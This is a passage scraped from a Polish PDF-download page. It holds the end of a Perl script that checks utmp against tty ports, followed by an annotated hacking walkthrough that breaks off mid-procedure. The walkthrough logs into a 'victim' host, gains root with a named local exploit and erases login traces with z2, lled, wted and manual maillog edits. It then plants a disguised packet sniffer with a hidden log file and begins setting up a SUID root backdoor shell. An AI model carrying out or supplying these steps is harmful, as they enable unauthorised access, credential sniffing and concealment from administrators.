[ Pobierz całość w formacie PDF ]
.\n";return undef;}# Build struct of ports containing port name, device num and owner.# Note: Test run in grepstr may *not* be portable for all Unix# types.Be forewarned! This was designed for Linux.# Hint: For all intents and purposes, s/^$ttybase([$ttyrange][$ttyports])$/# should return the same as what you expect in "struct utmp->ut_id".my($grepstr) = "^($ttybase\[$ttyrange\]\[$ttyports\])\$";my(%ports) = {};my($user, $rdev) = ();opendir(DEVDIR, "/dev");my(@devfiles) = readdir(DEVDIR);@devfiles = grep(/$grepstr/, @devfiles);close(DEVDIR);foreach (@devfiles) {/^$ttybase([$ttyrange][$ttyports])$/;if (!defined($1)) {print "check :: Warning! Could not extract port ID from $_.\n";} else {($user, $rdev) = (stat("/dev/$_"))[4, 6];$user = getpwuid($user);$ports{$1} = newport($_, $rdev, $user);}}# Check ownership of /dev ports.my(@logdev)=();foreach (sort(keys(%ports))) {push(@logdev, $_) if (%{$ports{$_}}->{"owner"} ne "root");}@logdev = sort(@logdev);# Check utmp (against ports detected as logged in);my(@logutmp)=();foreach (sort( { $a $b } keys(%entries))) {if (defined(%{$entries{$_}}->{"user"}) && defined(%{$entries{$_}}->{"host"}) &&defined(%{$entries{$_}}->{"id"}) && defined(%{$entries{$_}}->{"pid"})) {push(@logutmp, %{$entries{$_}}->{"id"})if ((%{$entries{$_}}->{"id"} =~ /[$ttyrange][$ttyports]/) &&((%{$entries{$_}}->{"user"} ne pack("a8", "")) ||((%{$entries{$_}}->{"host"} ne pack("a16", "")) &&(%{$entries{$_}}->{"id"} ne pack("a4", "")) &&(%{$entries{$_}}->{"line"} ne pack("a12", "")) &&(%{$entries{$_}}->{"pid"} > 0))));}}@logutmp = sort(@logutmp);# Check PIDs (find processes with active port ids)opendir(PIDDIR, "/proc");my(%processes) = {};my(@portprocesses) = ();foreach (grep(/\d+/, readdir(PIDDIR))) {local($procdata, $cmdline);open(PROCFILE, " see who is on the machine[/home/master]finger @victim.net[victim.net]No one logged on.******----> good no one on, we will log on[/home/master]telnet victim.netTrying xxx.206.xx.140.Connected to victim.net.Escape character is '^]'.Welcome to Victim Research Linux (http://www.victim.net) Red Hat 2.1Kernel 1.2.13 on a i586ns.victim.net login: jnsmithPassword:Linux 1.2.13.You have new mail.******----> Don't read his mail, you can cat all mail in /var/spool/mailand in each users /home/username/mail directory******----> Check again to see if anyone is on[jnsmith@ns jnsmith]$ w5:36am up 18 days, 8:23, 1 user, load average: 0.01, 0.00, 0.00User tty login@ idle JCPU PCPU whatjnsmith ttyp1 5:35am w******----> Just me, lets get root and get lost in the utmp![jnsmith@ns jnsmith]$ cd.term******----> Nice directory to hide stuff ;)[jnsmith@ns.term]$./.u******----> I had this already waiting, it was the umounc.c exploitDiscovered and Coded by Bloodmask and Vio, Covin 1996******----> We are now root, lets use z2 to become invisiblebash# z2 jnsmithZap2!******----> Let's see if we are still on.bash# w5:37am up 18 days, 8:24, 0 users, load average: 0.08, 0.02, 0.01User tty login@ idle JCPU PCPU what******----> Hmm.now there is no one on the system, i must have logged off ;)******----> We know we are root, but lets check you you can see.bash# whoamirootbash#******----> Yup, root.What directory are we in?bash# pwd/home/jnsmith/.term******----> Let's check the logsbash# cd /var/log******----> most of the time in /var/adm, this box uses /var/logbash# grep dormroom *maillog:Jan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.commaillog:Jan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.com******----> Yup, the z2 took care of everything but this maillog.bash# pico maillog******----> in pico i did a ctrl w, and searched for dormroom then ctrl k todelete lines******----> These were the lines deletedJan 29 05:31:58 ns in.telnetd[22072]: connect from dormroom.playhouse.comJan 29 05:35:29 ns in.telnetd[22099]: connect from dormroom.playhouse.combash# grep dormroom *******----> Yup.all clear ;)bash# w5:41am up 18 days, 8:27, 0 users, load average: 0.00, 0.00, 0.00User tty login@ idle JCPU PCPU what******----> Yup.all clear here too ;)******----> Lets show you how you would use lled and wted if the grep wouldhave shown something in those filesbash# cd ~jnsmith/.termbash# lledbash# lled -c dormroom.playhouseEntries stored: 527 Entries removed: 0Now chmod lastlog.tmp and copy over the original /var/log/lastlog******----> Nothing in the lastlogbash#bash# wted -e jnsmithEntries stored: 254 Entries removed: 0Now chmod wtmp.tmp and copy over the original /var/log/wtmp******----> Nothing in the wtmp, both of these would have shown in the grepwe just did in the /var/log (just showing you the commands)******----> Lets do some sniffing.bash# pico linsniffer.c******----> I changed this line to tell where i want the log to go:#define TCPLOG "/tmp/.pinetemp.000"******----> lets look at what is running to think of a name thatlooks almost like it belongs therebash# ps -auxroot 143 0.0 0.0 84 0 ? SW Jan 10 0:01 (lpd)root 154 0.0 0.0 118 0 ? SW Jan 10 0:00 (smbd)root 163 0.0 0.5 76 176 ? S Jan 10 0:00 nmbd -Droot 197 0.0 0.0 76 0 v03 SW Jan 10 0:00 (getty)root 198 0.0 0.0 76 0 v04 SW Jan 10 0:00 (getty)root 199 0.0 0.0 76 0 v05 SW Jan 10 0:00 (getty)root 200 0.0 0.0 76 0 v06 SW Jan 10 0:00 (getty)root 201 0.0 0.0 88 0 s00 SW Jan 10 0:00 (uugetty)root 209 0.0 0.2 35 76 ? S Jan 10 0:01 (update)root 210 0.0 0.3 35 124 ? S Jan 10 0:03 update (bdflush)root 10709 0.0 1.4 152 452 ? S Jan 27 0:10 httpdroot 11111 0.0 1.4 152 452 ? S Jan 27 0:07 httpdroot 14153 0.0 0.8 70 268 ? S Jan 16 0:03./inetdroot 14307 0.0 4.7 1142 1484 ? S Jan 16 1:16./namedroot 14365 0.0 0.0 76 0 v02 SW Jan 16 0:00 (getty)root 17367 0.0 1.4 152 452 ? S 11:01 0:02 httpd******----> lets compile it and name it nmbbash# gcc linsniffer.c -o nmb******----> lets load it.bash# nmb&[1] 22171******----> lets check the log file in /tmpbash#bash# cd /tmpbash# ls -al.pin*total 15691-rw-rw-r-- 1 root jnsmith 0 Jan 29 05:50.pinetemp.000******----> There it is, but we don't want our login to know about it!bash# chgrp root.pin*******----> Lets look now.bash# ls -al.pin*-rw-rw-r-- 1 root root 0 Jan 29 05:50.pinttemp.000bash#******----> This is good, Lets make an SUID shell so we don't have todo this again.(check for MD5 or other programs in the cron)bash# cd /binbash# ls -l shlrwxrwxrwx 1 root root 4 Mar 1 1996 sh -> bash******----> This is a sym link.bash# ls -l bash-rwxr-xr-x 1 root root 299296 Nov 2 1995 bash******----> here is the real file [ Pobierz całość w formacie PDF ]

zanotowane.pl

doc.pisz.pl

pdf.pisz.pl

unmsb.keep.pl